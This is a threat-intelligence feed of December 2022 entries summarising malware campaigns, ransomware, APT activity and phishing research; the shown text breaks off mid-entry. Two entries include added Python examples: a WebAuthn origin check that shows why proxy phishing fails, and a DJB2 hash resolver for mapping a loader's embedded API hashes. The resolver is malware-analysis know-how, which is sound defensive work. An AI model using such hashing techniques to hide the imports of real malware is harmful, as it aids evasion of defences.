- Intel Source:
- Securelist
- Intel Name:
- BlueNoroff_bypassing_MoTW
- Date of Scan:
- 2022-12-28
- Impact:
- LOW
- Summary:
- Researchers from Securelist discovered a new method the BlueNoroff group has adopted to evade the Mark-of-the-Web (MOTW) flag, the security measure whereby Windows displays a warning message when the user tries to open a file downloaded from the internet.
Source:
https://securelist.com/bluenoroff-methods-bypass-motw/108383/
—
- Intel Source:
- Cyble
- Intel Name:
- PureLogs_Stealer_Through_Spam_Campaigns
- Date of Scan:
- 2022-12-28
- Impact:
- MEDIUM
- Summary:
- Cyble Research and Intelligence Labs (CRIL) came across a tweet by TG Soft about the PureLogs information stealer. This tool is used by the Threat Actor (TA) “Alibaba2044” to launch a malicious spam campaign against targets based in Italy.
Source:
https://blog.cyble.com/2022/12/27/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/
—
- Intel Source:
- Palo Alto Networks
- Intel Name:
- Sandbox_Evasions_Navigating_the_Vast_Ocean
- Date of Scan:
- 2022-12-28
- Impact:
- LOW
- Summary:
- Palo Alto Networks customers receive improved detection for the evasions through Advanced WildFire.
Source:
https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/#post-126138-_feak18cweg6f
—
- Intel Source:
- Wordfence
- Intel Name:
- Vulnerability_in_YITH_WooCommerce_Gift_Cards
- Date of Scan:
- 2022-12-28
- Impact:
- LOW
- Summary:
- The Wordfence Threat Intelligence team has been tracking exploits targeting a Critical Severity Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards Premium, a plugin with over 50,000 installations according to the vendor.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Google_Ads_Traffic_Led_to_Multiple_Malware
- Date of Scan:
- 2022-12-27
- Impact:
- MEDIUM
- Summary:
- Researchers from SANS have identified Google Ads traffic that led to a fake TeamViewer page, which in turn delivered stealer packages built on free software.
Source:
https://isc.sans.edu/diary/Google+ad+traffic+leads+to+stealer+packages+based+on+free+software/29376/
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_Details_of_IcedID_BackConnect_Protocol
- Date of Scan:
- 2022-12-27
- Impact:
- LOW
- Summary:
- Team-Cymru researchers have continued monitoring the IcedID / BokBot activity and identified some insights derived from infrastructure associated with IcedID’s BackConnect (BC) protocol.
Source:
https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Details_About_Shadow_IT
- Date of Scan:
- 2022-12-27
- Impact:
- MEDIUM
- Summary:
- IBM Security Intelligence researchers have highlighted three incidents where Shadow IT was leveraged during the attack to help organizations realize how Shadow IT can quickly transform from a threat to an incident.
Source:
https://securityintelligence.com/posts/beware-lurking-shadows-it/
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Distributing_via_Virtual_Disk_Files
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that Qakbot malware has been distributed in ISO and IMG file formats and discovered that it has recently changed its distribution to the use of VHD files.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Vice_Society_Ransomware_Attackers_Adopt_Robust_Encryption_Methods
- Date of Scan:
- 2022-12-23
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelLabs have identified that the Vice Society group is adopting a new custom-branded ransomware payload, dubbed “PolyVice”, in recent intrusions. It implements a robust encryption scheme using the NTRUEncrypt and ChaCha20-Poly1305 algorithms.
—
- Intel Source:
- CADO Security
- Intel Name:
- New_Variant_of_Kiss_a_Dog_Cryptojacking_Campaign
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from Cado Security have uncovered a newer variant of the Kiss-a-Dog campaign and observed it hitting their Redis honeypot, suggesting a broadening of scope beyond Docker and Kubernetes.
Source:
https://www.cadosecurity.com/kiss-a-dog-discovered-utilizing-a-20-year-old-process-hider/
—
- Intel Source:
- Rapid7
- Intel Name:
- The_exploitation_of_OWASSRF_in_MS_Exchange_Server_for_RCE
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Rapid7 researchers have observed the exploitation of OWASSRF in Microsoft Exchange servers for remote code execution.
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Using_Phishing_Emails_to_Target_Tax_Forms
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from Fortinet discovered malicious emails sent by the recently resurgent Emotet group. Claiming to be from “IRS.gov”, the phishing email originated from a compromised email account at an organization in Pakistan. The subject and body claim that the recipient’s IRS K-1 forms are attached in a ZIP archive encrypted with the password “0440”.
Source:
https://www.fortinet.com/blog/threat-research/the-taxman-never-sleeps
—
- Intel Source:
- ASEC
- Intel Name:
- Nitol_DDoS_Malware_Installing_Amadey_Bot
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that a threat actor has been using the Nitol DDoS bot to install Amadey. Amadey is a downloader that has been in circulation since 2018 and, besides stealing user credentials, can also be used to install additional malware.
—
- Intel Source:
- Spider Labs
- Intel Name:
- Diving_Deep_into_Ekipa_RAT
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- SpiderLabs researchers have analyzed samples of an Ekipa Remote Access Trojan (RAT) in the wild and found interesting techniques for the use of malicious Office documents. The Ekipa RAT was added to a sophisticated threat actors’ cyber arsenal and used in the Russian – Ukraine war.
—
- Intel Source:
- TrendMicro
- Intel Name:
- IcedID_Botnet_Leveraging_Google_PPC_to_Distribute_Malware
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have analyzed the latest changes in IcedID botnet from a campaign that abuses Google pay-per-click (PPC) ads to distribute IcedID via malvertising attacks.
—
- Intel Source:
- Rewterz
- Intel Name:
- Ursnif_Banking_Trojan_Active_IOCs
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of the Ursnif banking Trojan. Ursnif, also known as Gozi and Dreambot, has been around for more than 10 years. It gained popularity in 2015 when its source code was published on GitHub, and since then its operators have kept tweaking it to suit their aims. It mainly attacks banks and other financial institutions.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-active-iocs-42
—
- Intel Source:
- Securelist
- Intel Name:
- The_Examination_of_Albanian_Government_E_service_Attack
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from Securelist have compared the first and second waves of ransomware and wiper malware used to target Albanian entities and detail connections with previously known ROADSWEEP ransomware and ZEROCLEARE variants.
Source:
https://securelist.com/ransomware-and-wiper-signed-with-stolen-certificates/108350/
—
- Intel Source:
- Rewterz
- Intel Name:
- North_Korean_APT_Kimsuky_Aka_Black_Banshee_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of North Korean APT Kimsuky Aka Black Banshee. It is a North Korean nation-state actor that has been active since 2012. It primarily targets South Korean government agencies and conducts espionage activities against targets in the United States and Japan.
—
- Intel Source:
- Rewterz
- Intel Name:
- Qakbot_aka_Qbot_Malware_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- The Rewterz analyst team has observed over the last couple of months that attackers are employing a number of strategies to avoid detection, using Excel 4.0 (XLM) macros and ZIP file extensions. Threat actors are disguising attachments intended to spread malware using a variety of common file names with typical keywords for finance and business operations.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-qakbot-qbot-malware-active-iocs-51
—
- Intel Source:
- Rewterz
- Intel Name:
- AsyncRAT_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of AsyncRAT. It is an open-source tool designed for remote monitoring via encrypted connections. However, it could be utilized by threat actors as it provides keylogging, remote access, and other functionality that could damage a victim’s computer or system.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-asyncrat-active-iocs-4
—
- Intel Source:
- Rewterz
- Intel Name:
- Shuckworm_APT_Group_aka_Armageddon_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Shuckworm APT Group. It is a Russia-backed advanced persistent threat (APT) that has been operating since at least 2013. The main goal of this APT is to use the malicious document to gain control of the target machine.
—
- Intel Source:
- Rewterz
- Intel Name:
- Wanna_Cryptor_aka_WannaCry_Ransomware_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- HIGH
- Summary:
- The Rewterz analyst team produced an analysis summary of Wanna Cryptor aka WannaCry ransomware and identified its active IOCs. WannaCry, also called WCry or WanaCrypt0r, was discovered in May 2017 when it infected networks running Microsoft Windows as part of a massive cyberattack. The ransomware encrypts data files and demands payment, usually in bitcoin, to restore them. WannaCry is one of the most damaging pieces of malware ever used in a cyberattack.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Meddler_in_the_Middle_Phishing_Attacks
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Palo Alto Unit 42 researchers explained the techniques behind Meddler in the Middle (MitM) phishing attacks, which show how threat actors find ways around traditional defenses and advice. MitM phishing attacks are a state-of-the-art type of phishing capable of breaking two-factor authentication (2FA) while avoiding many content-based phishing detection engines. Rather than showing a spoofed version of a target login page, a MitM attack uses a reverse-proxy server to relay the original login page directly to the user’s browser.
Source:
https://unit42.paloaltonetworks.com/meddler-phishing-attacks/
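Why the relay breaks password-plus-TOTP but not a WebAuthn login, as an added example that is not code from Unit 42: the proxy forwards whatever the user types, and a one-time code is just more typed text. A WebAuthn assertion, by contrast, is computed over a `clientDataJSON` structure in which the browser records the origin of the page that requested it. The meddler's page lives on the phishing origin, so the relying party's origin check fails. The signature over `clientDataJSON` and the `rpIdHash` check are omitted here to focus on the origin binding; a real relying party verifies both. The origins, challenge and the `browser_client_data` stand-in for the browser are constructed.

```python
"""Added example (not from the Unit 42 post): why a reverse-proxy ("meddler")
phishing page can relay a password and a TOTP code but not a WebAuthn
assertion. The relying party checks the origin the browser recorded in
clientDataJSON; a proxied login carries the phishing origin, so it is rejected.
Signature verification is omitted to keep the focus on the origin binding.
Origins and challenge are constructed."""
import base64
import json


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def browser_client_data(page_origin: str, challenge: str) -> str:
    """Stand-in for the browser: it fills in the origin of the page that called
    navigator.credentials.get(). Page script cannot change this value."""
    raw = json.dumps({"type": "webauthn.get", "challenge": challenge,
                      "origin": page_origin, "crossOrigin": False}).encode()
    return b64url_encode(raw)


def verify_client_data(client_data_b64url: str, expected_origin: str,
                       expected_challenge: str) -> tuple:
    """Relying-party side: the checks WebAuthn requires on clientDataJSON."""
    try:
        data = json.loads(b64url_decode(client_data_b64url))
    except ValueError:  # covers bad base64 and bad JSON
        return False, "clientDataJSON is not valid base64url JSON"
    if not isinstance(data, dict):
        return False, "clientDataJSON is not an object"
    if data.get("type") != "webauthn.get":
        return False, "unexpected ceremony type"
    if data.get("challenge") != expected_challenge:
        return False, "challenge mismatch (replay or wrong session)"
    if data.get("origin") != expected_origin:
        return False, f"origin mismatch: {data.get('origin')!r}"
    return True, "ok"


RP_ORIGIN = "https://login.example.com"         # the real site (constructed)
PHISH_ORIGIN = "https://login.example-com.net"  # the meddler's proxy (constructed)


def demo() -> tuple:
    """Same user, same authenticator, same challenge; only the page origin differs."""
    challenge = b64url_encode(b"\x01\x02\x03\x04" * 4)  # fresh per login in practice
    direct = verify_client_data(browser_client_data(RP_ORIGIN, challenge), RP_ORIGIN, challenge)
    proxied = verify_client_data(browser_client_data(PHISH_ORIGIN, challenge), RP_ORIGIN, challenge)
    return direct, proxied


if __name__ == "__main__":
    print(demo())
```

The direct login verifies; the proxied one is rejected with an origin mismatch even though the proxy forwarded everything faithfully, because the value it needed to change is the one the browser, not the page, controls. This is the concrete sense in which FIDO2/WebAuthn is phishing-resistant while TOTP and push approvals are not.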
—
- Intel Source:
- Rewterz
- Intel Name:
- APT_SideWinder_Group_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- The Rewterz analysts team have identified the active IOCs of APT SideWinder Group which is a suspected Indian threat actor group that has been active since 2012. It has been detected targeting Pakistani government officials with a decoy file related to COVID-19 in its most recent effort.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Windows_AMSI_Bypass_Techniques
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have analyzed the implementations that cybercriminals use to bypass the Windows Antimalware Scan Interface (AMSI).
Source:
https://www.trendmicro.com/en_us/research/22/l/detecting-windows-amsi-bypass-techniques.html
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Supply_Chain_Attack_Using_Python_Package_Index
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have discovered a zero-day attack embedded in a PyPI (Python Package Index) package called “aioconsol”.
—
- Intel Source:
- Sucuri
- Intel Name:
- FakejQuery_Domain_Redirects_Site_Visitors_to_Scam_Pages
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified an infection that makes its round across vulnerable WordPress sites, detected on over 160 websites. The infection is injected at the top of legitimate JavaScript files and executes a script from the malicious domain.
Source:
https://blog.sucuri.net/2022/12/fake-jquery-domain-redirects-site-visitors-scam.html
—
- Intel Source:
- Microsoft
- Intel Name:
- New_Zerobot_1_1_adds_new_exploits
- Date of Scan:
- 2022-12-22
- Impact:
- HIGH
- Summary:
- The new version of the malware, Zerobot 1.1, adds new exploits and distributed denial-of-service attack capabilities, expanding the malware’s reach to different types of Internet of Things (IoT) devices, according to a report released by Microsoft on Wednesday. Zerobot was first discovered by researchers in November. The malware spreads primarily through unpatched and improperly secured IoT devices, such as firewalls, routers, and cameras, according to Microsoft. Hackers constantly modify the botnet to scale and target as many of the devices as possible.
—
- Intel Source:
- Zscaler
- Intel Name:
- Diving_Deep_into_Nokoyawa_Ransomware
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have analyzed the Nokoyawa ransomware 2.0 including its new configuration, encryption algorithms, and data leak site.
Source:
https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Examine_of_Royal_Ransomware_and_Tools_Using_by_Threat_Actors
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro have detected multiple attacks from the Royal ransomware group and they have investigated the tools that Royal ransomware actors used to carry out their attacks.
—
- Intel Source:
- Cyble
- Intel Name:
- Spotted_multiple_ransomware_strains
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- Cyble Research and Intelligence Labs (CRIL) have spotted multiple ransomware strains created based on the source of other ransomware families. Recently, CRIL observed new ransomware families, such as Putin Team, ScareCrow, BlueSky Meow, etc., created from the leaked source code of Conti Ransomware.
Source:
https://blog.cyble.com/2022/12/22/new-ransomware-strains-emerging-from-leaked-contis-source-code/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Hackers_Using_Microsoft_Excel_Malicious_Addins
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have investigated another vector for introducing malicious code through Microsoft Excel: malicious add-ins, specifically XLL files.
Source:
https://blog.talosintelligence.com/xlling-in-excel-malicious-add-ins/
—
- Intel Source:
- Rewterz
- Intel Name:
- Hive_Ransomware_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Hive Ransomware. It is one of the quickest evolving ransomware families which was first observed in June 2021 and likely operates as affiliate-based ransomware, employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-hive-ransomware-active-iocs-28
—
- Intel Source:
- PaloAlto
- Intel Name:
- Russian_Hackers_Targeting_Petroleum_Refinery_in_NATO
- Date of Scan:
- 2022-12-21
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have discovered the Russia-linked Gamaredon group unsuccessfully attempting to break into a large petroleum refining company within a NATO member state earlier this year, amid the ongoing Russo-Ukrainian war. They have also seen more than 500 new domains and 200 malware samples attributed to the Gamaredon APT since the beginning of the invasion.
—
- Intel Source:
- Rewterz
- Intel Name:
- LockBit_3_0_Ransomware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- HIGH
- Summary:
- The Rewterz analyst team produced an analysis summary of LockBit 3.0 ransomware, which has recently been distributed without being restricted to a particular version or filename. Users must examine the file extensions of document files, update applications and V3 to the newest version, and be very cautious when opening files from unidentified sources.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-3-0-ransomware-active-iocs-4
—
- Intel Source:
- Rewterz
- Intel Name:
- SystemBC_Malware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- MEDIUM
- Summary:
- The Rewterz analyst team produced an analysis summary of SystemBC malware, which is currently being distributed through Emotet and SmokeLoader. The malware has been used in multiple ransomware attacks over the past few years. SystemBC acts as a proxy bot: an infected system can be used as a passage into the victim’s network.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-systembc-malware-active-iocs-8
—
- Intel Source:
- Rewterz
- Intel Name:
- GandCrab_Ransomware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- HIGH
- Summary:
- The Rewterz analyst team produced an analysis summary of GandCrab, a ransomware-as-a-service variant discovered in early 2018. Five versions of GandCrab have been created since its discovery. GandCrab encrypts victims’ files and demands ransom money in exchange for decryption keys. It targets organisations and individuals that use Microsoft Windows PCs, and has attacked a huge number of systems in India, Chile, Peru, the United States, and the Philippines.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gandcrab-ransomware-active-iocs-12
—
- Intel Source:
- Rewterz
- Intel Name:
- STOP_DJVU_Ransomware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- HIGH
- Summary:
- Rewterz analysts published an analysis summary of STOP (DJVU) ransomware. STOP/DJVU is a file-encrypting Trojan: it infiltrates the computer silently and encrypts all of the user's data, making it unavailable. It leaves a ransom note demanding money in exchange for decrypting the data. The malware is delivered via cracked applications, fake setup apps, keygens, activators, and fake Windows updates.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-stop-djvu-ransomware-active-iocs-50
—
- Intel Source:
- Rewterz
- Intel Name:
- BumbleBee_Malware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- MEDIUM
- Summary:
- Rewterz analysts published an analysis summary of the BumbleBee malware. This loader is used to download Cobalt Strike and other malware such as ransomware. It has replaced the BazarLoader backdoor, which was previously used to deliver ransomware payloads. The new malware is linked to a number of threat actors, including several well-known ransomware operators.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-bumblebee-malware-active-iocs-14
—
- Intel Source:
- TrendMicro
- Intel Name:
- Telecom_and_Governments_are_targeted_by_Raspberry_Robin_Malware
- Date of Scan:
- 2022-12-20
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers discovered new samples of the Raspberry Robin malware spreading in telecommunications and government office systems. The main payload is packed with more than 10 layers of obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools.
—
- Intel Source:
- Rewterz
- Intel Name:
- Snake_Keylogger_s_Malware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- MEDIUM
- Summary:
- Rewterz analysts published an analysis summary of the Snake Keylogger malware. Snake's main feature is keylogging, but it also has additional capabilities such as taking screenshots and extracting data from the clipboard. Snake can also extract and exfiltrate data from browsers and email clients.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-snake-keyloggers-malware-active-iocs-39
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Posing_of_SentinelOne_SDK_as_Malicious_PyPI_package
- Date of Scan:
- 2022-12-20
- Impact:
- LOW
- Summary:
- Researchers from ReversingLabs have identified a new malicious package, named 'SentinelOne', on the Python Package Index (PyPI) repository that impersonates a legitimate software development kit (SDK) for SentinelOne.
Source:
https://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk
—
- Intel Source:
- CrowdStrike
- Intel Name:
- GuLoader_Dissection_Malware_Analysis
- Date of Scan:
- 2022-12-20
- Impact:
- LOW
- Summary:
- CrowdStrike researchers expose GuLoader's complete behavior by mapping every embedded DJB2 hash value to the API the malware resolves with it.
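Hash-based API resolution, as described above, means the analyst has to recompute the hash for candidate API names and match them against the values embedded in the sample. The following is an added example (not CrowdStrike's code and not GuLoader's own routine): it implements the classic DJB2 variant (seed 5381, h = h*33 + c, truncated to 32 bits), builds a reverse lookup table over a constructed list of API names, and brute-forces the seed when a sample uses a non-standard one. The seed, salt and case handling of a real loader may differ, so those constants are assumptions to adjust per sample.

```python
# Added example: resolving DJB2 API hashes of the kind loaders embed in place
# of import names. Not CrowdStrike's or GuLoader's code; the seed/masking
# below are the textbook DJB2 constants and are an assumption for any given sample.
from typing import Dict, Iterable, List, Optional

DJB2_SEED = 5381
MASK32 = 0xFFFFFFFF


def djb2(name: bytes, seed: int = DJB2_SEED) -> int:
    """Classic DJB2: h = h*33 + c, kept to 32 bits as a native implementation would."""
    h = seed
    for c in name:
        h = ((h << 5) + h + c) & MASK32
    return h


# Constructed list of API names a loader typically resolves; in practice feed
# this from the export tables of kernel32/ntdll/etc. of the target OS.
CANDIDATE_APIS: List[bytes] = [
    b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc", b"VirtualProtect",
    b"CreateProcessW", b"NtAllocateVirtualMemory", b"NtProtectVirtualMemory",
    b"ShellExecuteW", b"WinHttpOpen", b"ExitProcess",
]


def build_hash_table(names: Iterable[bytes], seed: int = DJB2_SEED) -> Dict[int, str]:
    """Map hash -> API name so embedded constants can be resolved in one lookup."""
    return {djb2(n, seed): n.decode() for n in names}


def resolve_hashes(hashes: Iterable[int], names: Iterable[bytes] = CANDIDATE_APIS,
                   seed: int = DJB2_SEED) -> Dict[int, Optional[str]]:
    """Resolve each embedded hash to a name, or None if no candidate matches."""
    table = build_hash_table(names, seed)
    return {h: table.get(h) for h in hashes}


def find_seed(known_name: bytes, observed_hash: int, max_seed: int = 1 << 16) -> Optional[int]:
    """Recover a non-standard seed from one (name, hash) pair the analyst is sure of.

    Because 33 is odd, 33**n is invertible mod 2**32, so at most one seed in
    [0, 2**32) produces a given hash for a given name; scanning a bounded range
    is enough for the small seeds loaders usually pick.
    """
    for seed in range(max_seed):
        if djb2(known_name, seed) == observed_hash:
            return seed
    return None


if __name__ == "__main__":
    embedded = [djb2(b"VirtualAlloc"), djb2(b"CreateProcessW"), 0xDEADBEEF]
    for h, name in resolve_hashes(embedded).items():
        print(f"{h:#010x} -> {name}")
```

The usual workflow is to dump every 32-bit constant that feeds the sample's hashing routine, resolve them with `resolve_hashes`, and treat the unresolved remainder as either a non-standard seed (check with `find_seed` once one hash is known) or a name missing from the candidate list.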
—
- Intel Source:
- FlashPoint
- Intel Name:
- RisePro_Stealer_Malware_Presence_on_Russian_Market
- Date of Scan:
- 2022-12-20
- Impact:
- LOW
- Summary:
- Researchers from Flashpoint have observed RisePro stealer logs for sale on Russian Market, and the appearance of the stealer as a payload for a pay-per-install service, which may indicate its growing popularity and viability within the threat actor community.
Source:
https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/
—
- Intel Source:
- Nozomi Networks
- Intel Name:
- Malicious_Glupteba_Activity
- Date of Scan:
- 2022-12-19
- Impact:
- MEDIUM
- Summary:
- Nozomi Networks Labs shared its latest discoveries on the Glupteba trojan, an example of a threat actor leveraging blockchain-based technologies to carry out malicious activity.
Source:
https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_Leveraging_DELTA_System_Users_Using_FateGrab_or_StealDeal_Malware
- Date of Scan:
- 2022-12-19
- Impact:
- LOW
- Summary:
- CERT-UA researchers have identified the distribution of e-mails sent from a compromised e-mail address belonging to an employee of the Ministry of Defense. The attachments, in the form of PDF documents, imitate legitimate digests of the ISTAR unit of the Zaporizhzhia Police Department but contain a link to a malicious ZIP archive.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Infostealer_Malware_with_Double_Extension
- Date of Scan:
- 2022-12-19
- Impact:
- LOW
- Summary:
- Researchers from SANS analyzed an email attachment pretending to come from HSBC Global Payments and Cash Management. The file, named payment_copy.pdf.z, is actually a RAR archive, and the executable it contains uses a double extension ending in .pdf.exe. The file is an infostealer trojan and is detected by multiple scanning engines.
Source:
https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Malicious_Python_Package_Shaderz_Distributing_via_Supply_Chain_Attack
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Researchers from Fortinet analyzed the Shaderz zero-day malicious Python package and closely monitored the executables it downloads.
—
- Intel Source:
- Cyble
- Intel Name:
- CSC_Bank_Mitra_fraudulent_operation
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Cyble Research & Intelligence Labs studied a fraud scheme operation done by impostors posing as Village Level Entrepreneurs (VLEs) to dupe and scam Indian rural subscribers registering for Customer Service Point (Bank Mitra), an initiative under the Common Services Center (CSC) Scheme of the Ministry of Electronics and Information Technology (MEITY), India.
—
- Intel Source:
- Mandiant
- Intel Name:
- Ukrainian_Government_Networks_Breached_via_Trojanized_Windows_10_Installers
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have observed Ukrainian government entities being compromised in targeted attacks after their networks were first breached via trojanized ISO files posing as legitimate Windows 10 installers.
Source:
https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
—
- Intel Source:
- Cyfirma
- Intel Name:
- Russian_Threat_Groups_Launching_Multiple_Campaigns
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Cyfirma researchers have observed three campaigns named Evian, UNC064, and Siberian bear that are potentially operated by Russian-speaking threat groups on behalf of their Russian Masters.
—
- Intel Source:
- Microsoft
- Intel Name:
- MCCrash_Botnet_Targeting_Private_Minecraft_Servers
- Date of Scan:
- 2022-12-16
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have identified a cross-platform botnet named MCCrash that’s primarily designed to launch distributed denial-of-service (DDoS) attacks against private Minecraft servers. It is characterized by a unique spreading mechanism that allows it to propagate to Linux-based devices despite originating from malicious software downloads on Windows hosts.
—
- Intel Source:
- Cyble
- Intel Name:
- DarkTortilla_Malware_Spreading_Via_Phishing_Sites
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a malicious campaign where they observed hackers dropping DarkTortilla malware. It is a complex .NET-based malware that has been active since 2015 and the malware is known to drop multiple stealers and Remote Access Trojans (RATs) such as AgentTesla, AsyncRAT, NanoCore, etc.
Source:
https://blog.cyble.com/2022/12/16/sophisticated-darktortilla-malware-spreading-via-phishing-sites/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Agenda_Ransomware_Using_Rust_language
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro analyzed a sample of the Agenda ransomware written in Rust, detected as Ransom.Win32.AGENDA.THIAFBB. It has recently been targeting critical sectors such as healthcare and education.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Hackers_Leveraging_Google_Ads_to_Distribute_IcedID
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified campaigns pushing IcedID malware (also known as BokBot) via Google Ads that lead to fake software download pages.
Source:
https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344/
—
- Intel Source:
- Proofpoint
- Intel Name:
- Iran_linked_cyberspies_expand_targeting_to_medical_researchers_and_travel_agencies
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint analyzed the threat group TA453 and observed outlier campaigns that are likely to continue and that reflect IRGC intelligence collection requirements, including possible support for hostile, and even kinetic, operations.
Source:
https://www.proofpoint.com/us/blog/threat-insight/ta453-refuses-be-bound-expectations
—
- Intel Source:
- Checkmarx Security
- Intel Name:
- Hackers_Blast_Open_Source_Repositories_with_Over_144000_Malicious_Packages
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- Checkmarx researchers have identified that unknown threat actors uploaded a massive 144,294 phishing-related packages to open-source package repositories, including npm, PyPI, and NuGet.
Source:
https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/
—
- Intel Source:
- ESET Research
- Intel Name:
- Spearphishing_Campaign_Targeting_Japanese_Political_Entities
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- Researchers from ESET have discovered a spearphishing campaign targeting Japanese political entities a few weeks before the House of Councillors elections, and in the process uncovered a previously undescribed MirrorFace credential stealer.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_distribution_again
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- The ASEC analysis team has discovered that Magniber Ransomware is being distributed again with COVID-19 related filenames, while the threat actor has changed the infection vector and is using social engineering techniques.
—
- Intel Source:
- ASEC
- Intel Name:
- STOP_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the STOP ransomware is distributed in Korea and the files that are currently distributed are in the form of MalPe just like SmokeLoader and Vidar, and the filenames include a random 4-byte string.
—
- Intel Source:
